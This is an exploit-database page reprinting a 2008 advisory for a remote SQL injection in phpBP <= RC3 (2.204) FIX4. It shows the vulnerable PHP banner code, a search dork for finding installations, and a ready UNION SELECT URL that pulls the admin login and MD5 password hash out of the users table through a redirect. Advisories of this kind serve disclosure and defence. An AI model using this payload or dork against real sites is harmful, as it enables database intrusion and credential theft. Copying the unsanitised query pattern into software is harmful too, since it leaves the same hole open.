phpBP - exploit.company

vendor:

phpBP

by:

irk4z

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpBP

Affected Version From: <= RC3 (2.204) FIX4

Affected Version To: <= RC3 (2.204) FIX4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in phpBP <= RC3 (2.204) FIX4. An attacker can send a specially crafted HTTP request containing an SQL query to the vulnerable script, which will then be executed in the context of the web server process. This can be exploited to manipulate SQL queries by e.g. injecting arbitrary SQL code. This can be exploited to disclose the contents of the database, modify data, or gain access to sensitive information such as user credentials.

Mitigation:

Upgrade to the latest version of phpBP.

Source

Exploit-DB raw data:

.-----------------------------------------------------------------------------.
|  vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability        |
|  download: http://www.phpbp.com/                                            |
|  dork: "PHP BP Team"                                                        |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|                        --->    HACKBOX.pl    <---                           |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

 ./includes/functions/banners-external.php:
 ...
3   function banner_out() //zlicza ilosc klikniec na banner
4   {
5    global $conf;
6 
7    if($_GET['id'])
8    {
9     SQLvalidate($_POST['id']);
10
11    $db = new dbquery;
12    $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__); 
13 
14    if($db->num_rows()==0)
15    {
16     redirect('index.php?module=error?error=banners_error2');
17     exit;
18    } 
19 
20    $d=$db->fetch_object();
21    $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__); 
22 
23    redirect($d->url);
24   }
25
26   exit;
27  }
 ...

# exploit:

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

you will be redirect to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/)

# milw0rm.com [2008-03-16]